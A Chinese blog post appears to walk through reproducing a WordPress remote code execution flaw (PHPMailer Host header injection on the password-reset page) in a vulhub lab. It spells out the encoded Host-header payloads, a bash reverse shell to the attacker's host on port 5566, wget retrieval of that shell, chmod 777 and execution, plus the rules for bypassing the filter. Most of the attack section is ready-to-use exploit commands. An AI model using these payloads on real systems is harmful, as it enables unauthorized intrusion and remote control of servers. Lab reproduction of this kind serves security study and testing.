前言

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也算是一个内容管理系统(CMS)

环境搭建

docker环境 (搭建可参考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html)

靶场在vulhub即可下载

靶机centos7:192.168.31.230

攻击机kali: 192.168.31.153

导入后开启靶场
docker-compose build
docker-compose up -d

访问http://your-ip:8080/ ,安装cms系统



漏洞复现

漏洞点在忘记密码处,需要一个已知的用户可以发送数据

数据包中的Host字段的值修改为以下值,发送数据包,在/tmp下新建一个success文件
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

紧接着在kali的/var/www/html下新建一个1.txt,写入bash -i >& /dev/tcp/192.168.31.153/5566 0>&1

service apache2 start

发送shell数据包,将1.txt中的内容发送到靶机且新建一个shell文件存储
/usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt

发送数据包修改shell权限为777任意执行权限
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

发送数据包执行shell,kali监听5566端口
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

漏洞复现总结

1.该漏洞在数据包的host字段,执行的命令不能有: 、’符号

2.命令需要绝对路径

3.空格被\({substr{10}{1}{\)tod_log}}代替 /被\({substr{0}{1}{\)spool_directory}}代替

4.字段值需要全小写,且需要一个已知的用户

利用这个漏洞,发送反弹shell的文件,修改文件权限777,再用kali监听获取后台

最新文章

  1. Android开发学习——android体系结构
  2. C++ 全局变量、局部变量、静态全局变量、静态局部变量的区别
  3. Architecture.the-reactive-manifesto
  4. 骑士问题(knight) (BFS)
  5. c++ assert
  6. github/hexo搭建个人博客几个问题总结
  7. ***php 数组添加关联元素的方法小结(关联数组添加元素)
  8. php操作xml详解
  9. hdu4521(线段树+dp)
  10. MAC安装Securecrt破解
  11. SpringBoot的事件监听
  12. GIL
  13. Timer 的学习
  14. LeetCode(79): 单词搜索
  15. wed
  16. linux中sed命令的使用
  17. 使用Hexo+Github搭建属于自己的博客(进阶)
  18. 标准遗传算法(二进制编码 python实现)
  19. 解决ios10以上点击缩放的问题
  20. Linq查询条件里有可空字段比较时报错variable '<>h__TransparentIdentifier2' of type referenced from scope '', but it is not defined

热门文章

  1. Transformer 结构分析
  2. Java Timer使用介绍
  3. JMETER与BeanShell
  4. Jmeter之聚合报告“造假”
  5. 2022-11-09 Acwing每日一题
  6. .NET实现堆排序
  7. 新零售SaaS架构:多租户系统架构设计
  8. Xamarin.Android带参数返回上一级界面
  9. 通过启动脚本控制PHP-FPM开关
  10. Django基础笔记5(Session)